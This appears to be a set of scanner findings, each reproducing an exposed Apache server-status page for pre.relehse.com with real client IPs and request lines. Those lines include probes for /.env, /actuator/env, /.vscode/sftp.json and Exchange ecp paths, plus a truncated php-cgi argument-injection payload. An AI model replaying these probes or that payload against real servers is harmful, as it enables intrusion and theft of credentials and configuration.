157.175.65.51http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/148/39429_ 22.311054195196533300.03.311237.84 104.23.251.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/120/38823_ 22.17108910246136170.03.271264.89 64.227.32.66http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/140/38835_ 22.0710945167209130.01.621182.15 34.116.39.68http/1.1relehse.com:443GET /admin_layout/bootstrap/js/bootstrap.min.js HTTP/1.1 3-32133238250/141/38813_ 21.77104931175537410.01.921190.13 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/145/39104_ 22.4466615194177840.01.521311.93 172.68.135.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/144/39164_ 22.1810491274211380.02.151256.57 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-32133238250/131/38490_ 22.076601823312700.02.931229.00 157.175.65.51http/1.1 3-32133238250/134/39589_ 21.77108829316285110.02.191267.48 138.197.191.87http/1.1relehse.com:443GET /_all_dbs HTTP/1.1 4-32133238260/355/33611_ 35.2913960303146640.028.671086.96 198.41.231.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/380/33707_ 36.32139927145075320.07.311150.37 64.227.32.66http/1.1pre.relehse.com:443GET /config.json HTTP/1.1 4-32133238260/368/33773_ 35.4010870145607010.06.451164.53 172.70.208.69h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/366/34107_ 36.32140529161079310.06.741038.10 64.227.32.66http/1.1pre.relehse.com:443POST /api/gql HTTP/1.1 4-32133238260/361/33560_ 36.241668
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27f3ed9b85
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 10-Nov-2025 04:34:44 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 322 Parent Server MPM Generation: 321 Server uptime: 58 days 16 hours 13 minutes 41 seconds Server load: 0.24 0.18 0.09 Total accesses: 1831636 - Total Traffic: 56.8 GB - Total Duration: 1054254381 CPU Usage: u206.66 s228.24 cu10031.6 cs5642.2 - .318% CPU load .361 requests/sec - 11.7 kB/second - 32.5 kB/request - 575.581 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03323830no0yes010000 13323827no1yes010000 23323961no1yes010000 33323825no0yes19000 43323826no0yes010000 Sum502 149000 _____________________________________W____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32133238300/27/34514_ 17.2413654274921330.00.191273.84 172.68.164.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/38/33952_ 17.1613650429237190.00.441159.75 198.41.231.29h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/31/34258_ 17.7013651146026250.00.251167.21 138.197.191.87http/1.1relehse.com:443GET /admin_layout/plugins/.DS_Store HTTP/1.1 0-32133238300/28/34253_ 17.7027729163966650.00.161188.99 34.116.39.67http/1.1 0-32133238300/34/34563_ 17.2413650152906790.00.361188.93 172.68.164.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/38/34674_ 18.0710160235650.00.351178.59 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-32133238300/41/34678_ 17.982813228992820.00.351084.61 34.116.39.67http/1.1relehse.com:443GET /admin_layout/assets/js/libs/lodash.compat.min.js HTTP/1.1 0-32133238300/30/34163_ 17.1613640144585230.00.341133.49 198.41.230.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32133238300/34/34509_ 17.972811155322690.00.621125.60 34.116.39.67http/1.1relehse.com:443HEAD /admin_layout/plugins/nprogress/nprogress.js HTTP/1.1 0-32133238300/38/34343_ 17.7013652183297830.00.971217.26 138.197.191.87http/1.1relehse.com:443GET /admin_layout/plugins/fullcalendar/.DS_Store HTTP/1.1 1-32133238270/460/39392_ 34.3110166155830.08.021244.01 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-32133238270/457/40058_ 34.290223202922650.07.571286.24 172.68.242.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32133238270/445/39680_ 34.3100195696430.07.411200.92 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-32133238270/479/39446_ 34.3130189954330.011.281141.65 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-32133238270/477/40258_ 34.3130168210130.06.871236.03 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-32133238270/436/40853_ 34.29028178115430.07.561217.74 64.227.32.66http/1.1pre.relehse.com:443GET /images/companies/.DS_Store HTTP/1.1 1-32133238270/480/40004_ 34.29338216035440.08.431194.99 64.227.32.66http/1.1pre.relehse.com:443GET /.env HTTP/1.1 1-32133238270/462/40628_ 34.29231168318680.06.611185.38 64.227.32.66http/1.1pre.relehse.com:443GET /info.php HTTP/1.1 1-32133238270/478/38839_ 34.3130165919430.09.071105.22 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-32133238270/468/40152_ 34.27334399281560.08.141108.61 64.227.32.66http/1.1pre.relehse.com:443POST /api/graphql HTTP/1.1 2-32133239610/379/36651_ 31.7640182891260.010.501077.63 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-32133239610/362/35703_ 31.7620225760710.07.211013.99 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-32133239610/379/36434_ 31.7242247572090.09.901090.54 64.227.32.66http/1.1pre.relehse.com:443GET /help/.DS_Store HTTP/1.1 2-32133239610/374/35645_ 31.7600171907220.058.261047.91 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-32133239610/367/35955_ 31.7640145135410.06.511265.30 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-32133239610/347/36330_ 31.7232164394500.030.171083.28 64.227.32.66http/1.1pre.relehse.com:443GET /images/.DS_Store HTTP/1.1 2-32133239610/365/36142_ 31.7610163704830.07.941080.19 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-32133239610/388/36004_ 31.7520172018850.010.141094.86 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 2-32133239610/367/36400_ 31.7620167315760.06.841198.07 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-32133239610/365/36297_ 31.7620192517990.05.751117.82 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-32133238250/147/39732_ 22.171326236405200.02.711254.87 64.227.32.66http/1.1pre.relehse.com:443GET /templates/.DS_Store HTTP/1.1 3-32133238250/153/38428_ 20.48150186181780.01.981122.42 34.96.47.34http/1.1 3-32133238250/147/39428_ 22.1750196529400.03.311237.84 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-32133238250/120/38823_ 22.171210246136170.03.271264.89 64.227.32.66http/1.1pre.relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-32133238250/140/38835_ 22.07135167209130.01.621182.15 34.116.39.68http/1.1relehse.com:443GET /admin_layout/bootstrap/js/bootstrap.min.js HTTP/1.1 3-32133238250/141/38813_ 21.77531175537410.01.921190.13 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32133238250/144/39103_ 22.161526194177530.01.521311.93 64.227.32.66http/1.1pre.relehse.com:443GET /v2/_catalog HTTP/1.1 3-32133238250/143/39163W 22.1600274211370.02.151256.57 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-32133238250/131/38490_ 22.07131823312700.02.931229.00 34.96.47.93http/1.1 3-32133238250/134/39589_ 21.771229316285110.02.191267.48 138.197.191.87http/1.1relehse.com:443GET /_all_dbs HTTP/1.1 4-32133238260/355/33611_ 35.2990303146640.028.671086.96 198.41.231.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/380/33707_ 36.321227145075320.07.311150.37 64.227.32.66http/1.1pre.relehse.com:443GET /config.json HTTP/1.1 4-32133238260/368/33773_ 35.404030145607010.06.451164.53 172.70.208.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32133238260/366/34107_ 36.321829161079310.06.741038.10 64.227.32.66http/1.1pre.relehse.com:443POST /api/gql HTTP/1.1 4-32133238260/361/33560_ 36.242811165779340.05.811053.57 34.116.39.68http/1.1relehse.com:443HEAD /admin_layout/plugins/uniform/jquery.uniform.min.js HTTP/1 4-321332
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27815392f2
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 16:27:58 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 315 Parent Server MPM Generation: 314 Server uptime: 57 days 4 hours 6 minutes 56 seconds Server load: 0.00 0.03 0.04 Total accesses: 1801904 - Total Traffic: 56.0 GB - Total Duration: 1035247658 CPU Usage: u173.22 s200.3 cu9876.22 cs5537 - .32% CPU load .365 requests/sec - 11.9 kB/second - 32.6 kB/request - 574.53 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03208962no0yes010000 13208961no0yes010000 23209093no1yes010000 33208959no1yes19000 43208960no0yes010000 Sum502 149000 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31432089620/14/34076_ 11.08124782270540980.00.251268.80 178.128.207.138http/1.1barrerasdecontencion.com:443GET /swagger.json HTTP/1.1 0-31432089620/22/33531_ 11.08124593420927430.00.261153.68 178.128.207.138http/1.1barrerasdecontencion.com:443GET /v3/api-docs HTTP/1.1 0-31432089620/14/33837_ 9.6812470144648180.00.861160.68 198.41.231.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/9/33806_ 11.09123881155917670.00.541183.55 178.128.207.138http/1.1barrerasdecontencion.com:443GET /debug/default/view?panel=config HTTP/1.1 0-31432089620/15/34134_ 11.09123283142919220.00.721183.84 178.128.207.138http/1.1barrerasdecontencion.com:443GET /info.php HTTP/1.1 0-31432089620/13/34252_ 10.4412380159094340.00.651173.59 198.41.227.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/14/34236_ 10.2829340222825360.00.811079.54 172.71.146.212h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/13/33710_ 9.7529340139605950.00.131127.14 172.69.71.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/16/34066_ 10.5212450151139730.00.411120.30 162.158.82.167h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/21/33882_ 10.4412320176592140.00.521211.11 172.71.175.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/13/38903_ 9.4631770164385290.00.441235.57 172.69.138.70h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/18/39576_ 10.46124775201184510.00.971277.76 178.128.207.138http/1.1barrerasdecontencion.com:443GET /swagger/v1/swagger.json HTTP/1.1 1-31432089610/15/39206_ 9.2129331194112270.00.311192.68 104.23.186.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/17/38937_ 10.0129390188108400.00.641129.52 162.158.82.164h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-31432089610/16/39756_ 9.3429330166479320.02.351228.86 162.158.120.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/11/40383_ 9.3412460176460310.00.541208.98 162.158.120.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/10/39491_ 10.0129390214210100.00.331184.93 162.158.82.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/10/40137_ 10.0129390166712470.00.191177.73 162.158.82.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/20/38333_ 9.3429340164405640.00.441094.35 162.158.120.208h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-31432089610/9/39657_ 9.2531770397437490.00.121099.40 172.68.70.233h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/362/35510_ 30.430177178329570.015.961051.16 172.70.130.199h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/359/34608_ 30.6020213348270.011.18992.47 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-31432090930/371/35316_ 30.57317239870780.08.941066.55 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/382/34531_ 30.6000167444940.08.75974.78 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-31432090930/371/34856_ 30.5930136105090.07.301244.16 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/377/35256_ 30.6000156481650.08.751041.01 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-31432090930/351/34997_ 30.5420154866790.015.231057.33 172.64.200.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/339/34863_ 30.02326164521780.08.371068.71 162.158.120.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/391/35279_ 30.6010158695270.07.461175.11 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-31432090930/353/35190_ 30.6010186725930.031.771083.93 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-31432089590/346/39267_ 24.9230234544190.04.271241.55 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-31432089590/366/37951W 24.9200183798770.08.101108.98 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-31432089590/332/38952_ 24.9220194743160.09.381223.66 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-31432089590/313/38361_ 24.9230241822830.011.561251.34 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-31432089590/367/38345_ 24.9210165482870.09.331169.23 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-31432089590/337/38358_ 24.9300173779850.05.051176.06 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-31432089590/335/38621_ 24.9040192317070.09.031297.63 172.69.90.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/342/38665_ 24.83021272468560.021.721240.32 172.68.135.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/355/38014_ 24.812188821611780.06.601214.73 172.70.100.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/331/39135_ 24.90323314704120.06.001254.74 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/26/33175_ 11.33123379301203440.00.421053.23 178.128.207.138http/1.1barrerasdecontencion.com:443GET /config.json HTTP/1.1 4-31432089600/28/33245_ 10.1010700142974460.00.461139.00 43.157.195.60http/1.1 4-31432089600/21/33324_ 10.1112350143814650.00.271153.11 104.23.186.235h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/21/33663_ 10.131075315159047660.00.891025.83 172.71.147.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/22/33120_ 10.09
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2762cc4d3e
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 03:26:26 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 311 Parent Server MPM Generation: 310 Server uptime: 56 days 15 hours 5 minutes 23 seconds Server load: 0.09 0.07 0.01 Total accesses: 1790851 - Total Traffic: 55.7 GB - Total Duration: 1030714294 CPU Usage: u186.43 s208.25 cu9793.41 cs5480.51 - .32% CPU load .366 requests/sec - 11.9 kB/second - 32.6 kB/request - 575.544 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03122952no0yes010000 13122951no0yes19000 23123083no0yes010000 33122949no1yes010000 43122950no1yes19000 Sum502 248000 ____________R___________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31031229520/19/34056_ 13.2817091270447520.00.291268.46 104.23.239.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/16/33506_ 13.3914322420808070.01.571153.33 139.59.132.8http/1.1pre.relehse.com:443GET /.DS_Store HTTP/1.1 0-31031229520/11/33820_ 10.9914322144590430.00.091159.72 162.159.99.63h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/25/33794_ 12.9514350155902080.00.371182.73 172.70.111.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/25/34115_ 11.2217040142847970.00.401183.07 172.71.166.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/23/34238_ 13.01170929159084780.00.921172.94 138.197.191.87http/1.1relehse.com:443GET /.env HTTP/1.1 0-31031229520/25/34220_ 13.031704150222806890.00.181078.72 172.68.242.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/10/33693_ 12.3717040139581930.00.691126.80 141.101.100.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/11/34048_ 13.38143529151105110.00.201119.80 139.59.132.8http/1.1pre.relehse.com:443GET /swagger.json HTTP/1.1 0-31031229520/11/33858_ 10.1017040176510030.00.241210.50 172.71.239.70h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/24/38775_ 13.3314361163933880.00.661231.75 172.71.172.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/24/39439_ 13.3217040200657560.01.441273.71 206.189.19.19http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 1-31031229510/15/39073R 13.0800193633510.00.191189.26 172.71.158.226h2tandemsl.com:443GET / HTTP/2.0 1-31031229510/19/38797_ 13.3217040187586690.00.641125.68 206.189.19.19http/1.1relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-31031229510/20/39630_ 13.08170426166002510.00.281223.05 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/18/40257_ 13.4314260176043750.00.141205.06 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-31031229510/23/39361_ 13.3314370213774950.01.071181.46 172.70.248.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/16/40008_ 13.43143633166204010.00.871174.39 139.59.132.8http/1.1pre.relehse.com:443POST /api/gql HTTP/1.1 1-31031229510/20/38202_ 13.42143735163883360.00.641091.09 139.59.132.8http/1.1pre.relehse.com:443POST /graphql HTTP/1.1 1-31031229510/19/39529_ 13.3214260396913480.00.741096.06 206.189.19.19http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/67/35112_ 13.961431504176170080.00.901034.79 172.70.215.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/75/34206_ 16.39143027211391400.020.79980.33 139.59.132.8http/1.1pre.relehse.com:443GET /config.json HTTP/1.1 2-31031230830/72/34902_ 16.38143529237916030.01.511056.93 139.59.132.8http/1.1pre.relehse.com:443GET /swagger/v1/swagger.json HTTP/1.1 2-31031230830/69/34113_ 15.461435267165252530.09.04965.53 172.70.100.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/63/34452_ 16.3914270134224960.01.281236.60 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-31031230830/59/34836_ 16.2817040154352440.022.671030.60 206.189.19.19http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/63/34601_ 16.2817040152709050.00.911041.29 206.189.19.19http/1.1relehse.com:443GET /login.action HTTP/1.1 2-31031230830/64/34491_ 16.38143429162783160.02.511059.99 139.59.132.8http/1.1pre.relehse.com:443GET /actuator/env HTTP/1.1 2-31031230830/70/34846_ 16.04142727156680900.02.101166.99 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/53/34800_ 15.4414270184845390.02.191051.81 141.101.100.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31031229490/420/38855_ 34.465186232765360.09.281235.98 172.70.222.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31031229490/413/37523_ 34.5220182447120.011.511100.47 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-31031229490/417/38550_ 34.5410193388540.010.851213.57 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-31031229490/408/37977_ 34.5200240486680.012.221239.03 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-31031229490/408/37911_ 34.5420163750690.038.941159.70 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-31031229490/429/37960_ 34.5240172404120.08.861170.45 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-31031229490/392/38211_ 34.0532036190189590.017.961287.94 141.101.97.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31031229490/412/38259_ 34.254709271078850.06.951217.97 172.71.183.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31031229490/396/37597_ 34.5430818077420.07.831207.58 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-31031229490/405/38734_ 34.5420313457600.013.361248.28 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-31031229500/497/33025W 34.4800300871370.012.241051.85 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-31031229500/483/33103_ 34.4830142704400.012.151137.77 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-31031229500/465/33182_ 34.4900143602270.018.921151.70 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-31031229500/478/33526_ 34.4910158822080.024.031023.99 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-31031229500/493/32979_ 34.4810163394800.018.491040.93 143.110
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b273d4a7db5
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 03:02:40 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 311 Parent Server MPM Generation: 310 Server uptime: 56 days 14 hours 41 minutes 37 seconds Server load: 0.01 0.03 0.02 Total accesses: 1790705 - Total Traffic: 55.7 GB - Total Duration: 1030655261 CPU Usage: u184.9 s207.7 cu9793.41 cs5480.51 - .32% CPU load .366 requests/sec - 11.9 kB/second - 32.6 kB/request - 575.558 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03122952no0yes010000 13122951no0yes010000 23123083no0yes010000 33122949no4yes19004 43122950no2yes010000 Sum506 149004 ____________________________________W_____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31031229520/19/34056_ 13.282831270447520.00.291268.46 104.23.239.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/16/33506_ 13.3962420808070.01.571153.33 139.59.132.8http/1.1pre.relehse.com:443GET /.DS_Store HTTP/1.1 0-31031229520/11/33820_ 10.9962144590430.00.091159.72 162.159.99.63h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/25/33794_ 12.9590155902080.00.371182.73 172.70.111.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/25/34115_ 11.222780142847970.00.401183.07 172.71.166.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/23/34238_ 13.0128329159084780.00.921172.94 138.197.191.87http/1.1relehse.com:443GET /.env HTTP/1.1 0-31031229520/25/34220_ 13.03278150222806890.00.181078.72 172.68.242.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/10/33693_ 12.372780139581930.00.691126.80 141.101.100.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31031229520/11/34048_ 13.38929151105110.00.201119.80 139.59.132.8http/1.1pre.relehse.com:443GET /swagger.json HTTP/1.1 0-31031229520/11/33858_ 10.102780176510030.00.241210.50 172.71.239.70h2lcftech.es:443done, streams: 